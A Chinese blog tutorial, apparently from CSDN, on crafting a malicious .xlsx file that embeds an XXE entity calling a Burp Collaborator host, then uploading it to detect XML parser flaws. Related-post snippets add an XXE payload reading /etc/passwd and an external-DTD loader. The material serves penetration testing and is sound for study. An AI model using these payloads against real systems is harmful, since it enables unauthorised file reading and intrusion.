利用EXCEL进行XXE攻击

于 2023-09-19 15:09:38 发布
阅读量893 收藏
点赞数
文章标签: excel
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43264067/article/details/133028838
版权

利用EXCEL进行XXE攻击

原因

Microsoft Office从2007版本引入了新的开放的XML文件格式,新的XML文件格式基于压缩的ZIP文件格式规范,由许多部分组成。

我们可以将其解压缩到特定的文件夹中来查看其包含的文件夹和文件,可以发现其中多数是描述工作簿数据、元数据、文档信息的XML文件。

我们创建一个excle,并解压

xl/drawings/drawing1.xml
xl/worksheets/sheet1.xml
xl/worksheets/_rels/sheet1.xml.rels
xl/sharedStrings.xml
xl/styles.xml
xl/workbook.xml
xl/_rels/workbook.xml.rels
_rels/.rels
[Content_Types].xml

在这里插入图片描述
需要修改workbook.xml文件,以下内容插入第2行和第3行,SYSTEM后面自己添加相对应的dns记录均可,我习惯使用burp的collaborator模块

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://gtdwmy7gvrncy5rvfu11kxzl2c82wr.burpcollaborator.net/"> ]>
<x>&xxe;</x>

添加好后重新打包成excle的后缀,如xxe.xlsx
此时恶意文件就做好了,找到对应的文件上传的接口,直接上传excle文件,观察dns是否有记录

Xuno_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
简析xxe攻击方式
05-09
简析xxe攻击方式
XXE攻击揭秘
07-22
图文并茂的介绍了OWASP TOP 10中的 XXE攻击,非常具有可读性
Java中利用EXCEL进行XXE攻击
weixin_42296449的博客
03-31 3243
Java中常见解析Excel引入的XXE组件复现与分析 新建excel文件 修改后缀为.zip 在zip文件中,修改[Content_Types].xml,在其中加入XXE验证POC 重新修改后缀为 .xlsx 结果发现 直接通过 SAXReader 来解析xml文档,导致xxe漏洞的产生 修复方案 是在此处增加了一个SAXHelper类来进行防御处理 Apache POI,受影响...
(翻译)一种xxe盲打的骚姿势,通过在上传的文件中得到结果
qq_36093477的博客
09-26 2450
背景 在之前的报道中,我们了解了很多关系在访问者浏览器执行代码;反射的xss和储存的xss。此外,我们快速查看配置错误的服务器设置和打开重定向。 今天我们将仔细研究从服务器窃取私人文件。 挑选一个目标 一如既往,我们需要一个好的目标。一个在荷兰的最大的电子商务网站 Bol.com。他们处理我的开放重定向错误报告的方式非常好。快速回复,正确修复并始终向我发送更新。没有麻烦,没有NDA,快乐的语气。公...
初识XXE漏洞
Sea_Sand息禅
06-05 797
1、XXE简介 XXE全称是XML External Entity,也就是XML外部实体注入。 如果系统允许攻击利用XML调用外部实体,那么攻击这就可以在调用外部实体时构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 2、可能的场景 很多的网站都会对xml文件进行解析,解析的时候都有可能出现可用的XXE漏洞,从而被攻击利用攻击的方法基于实体中可以使用的协议...
文件上传xlsx之XXE漏洞
LAngle9的博客
11-18 1909
1 新建一个excel文件2 修改后缀名为.zip格式3解压缩出文件夹4 文件结构如下,可以进行修改,给excel添加一些功能键可结合VBA添加事件。5修改完成后,全选文件,进行压缩。注:不要选sss文件夹来压缩,要全选文件。6 压缩文件格式选择.zip格式。7产生压缩文件8 修改后缀名9 打开文件成功,看到之前在。excel 修改设置(将excel修改后缀名,解压缩方式)_下雨了620的博客-CSDN博客_excel改为rar后没有xl。使用BURP的dnslog地址看是是否有回显。
记一次excel XXE漏洞
mingyqf的博客
07-04 1950
​ LSA / 2020-05-21 09:00:16 / 浏览数 20953
SRC漏洞挖掘经验分享
hongduilanjun的博客
09-04 148
状态显然不止有"成功",肯定也有"失败",不然它就没有意义了,也就是说如果存在注入,我们无需登录即可将JS注入用户界面,进而在用户登录后造成攻击。ENTITY % b SYSTEM "http://你服务器的IP/x.dtd">%b;MTIzNA==显然是base64编码后的结果,解码发现是1234,应该是用来进行身份验证的,不同用户的x值不同。结果并没有出现弹框,查看前端代码,onerror被替换为空了<img src=1 ="alert(1);</script>并没有出现弹框,说明<>被编码了。
xxe:小型Web服务器利用XXE
04-09
小型Web服务器可以利用XXEXXE ( Xml eXternal Entity )-基于在处理xml文档期间包含外​​部实体的一类漏洞。 安装和启动 git clone [email protected]:egorchistov/xxe.git pip install -r requirements.txt ...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
最新发布
09-15
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
xxexploiter:帮助利用XXE漏洞的工具
02-06
它生成XML有效负载,并自动启动服务器以服务所需的DTD或进行数据渗透。 安装 #install node and npm if you don't have it yet npm install -g xxexploiter 从源代码构建和运行 这是一个用打字稿编写的简单Node...
SCAN_XXE:利用XML XXE漏洞
05-07
SCAN_XXE 利用XML XXE漏洞
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
第四节 XXE漏洞利用 - 任意文件读取-01
EXCEL基础知识
weixin_41402069的博客
05-12 360
操作界面(2013版) 自定义快捷访问(可以添加常用的工具) 展开选项卡里有默认的一些工具,打了勾的可以取消勾选从快速访问栏里删除。 添加常用工具到快速访问栏 以格式刷和框线编制为例 找到常用的格式刷和边框线后-鼠标右键-弹出栏目里悬着添加到快速访问工具栏中。 添加后的效果 找到你常用的格式刷和边框线后-鼠标右键-弹出栏目里悬着添加到快速访问工具栏中。 添加后的效果 4. ...
excel 导入数据,xxe 注入 poi 3.15
u011820505的博客
04-27 2394
问题:xxe是xml为载体,xlsx就是含有xml的 构造的是一个带有攻击代码的xlsx文件,里面带有一个我自定义的域名,后台解析后,访问了我指定的这个域名,说明注入成功 解决: poi之前是3.9 升级到3.15以上 所需jaroftenUsed ('org.apache.poi:poi:3.17') { transitive = false } ...
Xxe漏洞 php,PhpSpreadsheet 1.5.0 XXE漏洞复现及分析
weixin_36337122的博客
03-16 501
0x01 前言PhpSpreadsheet是一个非常流行的纯 PHP 类库,能够让你方便的读写Excel、LibreOffic Calc等表格格式的文件,是PHPExcel的替代者。2018年11月13日,PhpSpreadsheet 被爆出存在XXE漏洞(CVE-2018-19277),在表格的解压文件中插入UTF-7编码的恶意xml payload,可绕过PhpSpreadsheet 库的安...
XXE攻击指什么?其攻击原理是什么?
oldboyedu1的博客
02-13 748
也就是说服务端接收和解析了来自用户端的XML数据,而又没有做严格的安全控制,从而导致XML外部实体注入,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。XXE漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件。XXE攻击是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。XXE攻击原理是什么?
基于pikachu靶场实施XXE攻击
05-23
XXE攻击(XML External Entity Injection)是一种常见的网络安全攻击,它利用 XML 解析器的漏洞,将恶意的 XML 实体注入到应用程序中,从而实现对目标系统的攻击。下面介绍如何在 pikachu 靶场上实施 XXE 攻击。 步骤1:选择目标 在 pikachu 靶场中,可以选择一个目标进行攻击。例如,选择其中一个常见的目标“WebGoat”,这是一个用于学习 Web 应用程序漏洞的靶场。在 pikachu 靶场中,可以通过访问“https://ip:8443/WebGoat/attack”进入 WebGoat 靶场。 步骤2:查找漏洞 在 WebGoat 靶场中,有许多不同类型的漏洞可供攻击利用。在这里,我们将选择“XXE Injection”漏洞进行攻击。 步骤3:编写攻击脚本 编写攻击脚本,该脚本将恶意的 XML 实体注入到目标应用程序中。以下是一个简单的攻击脚本示例: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo> ``` 在此脚本中,我们注入了一个实体“xxe”,它将读取目标系统的“/etc/passwd”文件并将其返回。 步骤4:发送攻击攻击脚本发送到目标系统。在 WebGoat 靶场中,可以通过简单地将脚本复制并粘贴到相应的输入框中进行攻击。 步骤5:获取攻击结果 如果攻击成功,将返回目标系统的“/etc/passwd”文件内容。 需要注意的是,XXE 攻击可能会导致目标系统中的敏感信息泄露,因此请在合法授权和合规框架内进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Xuno_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值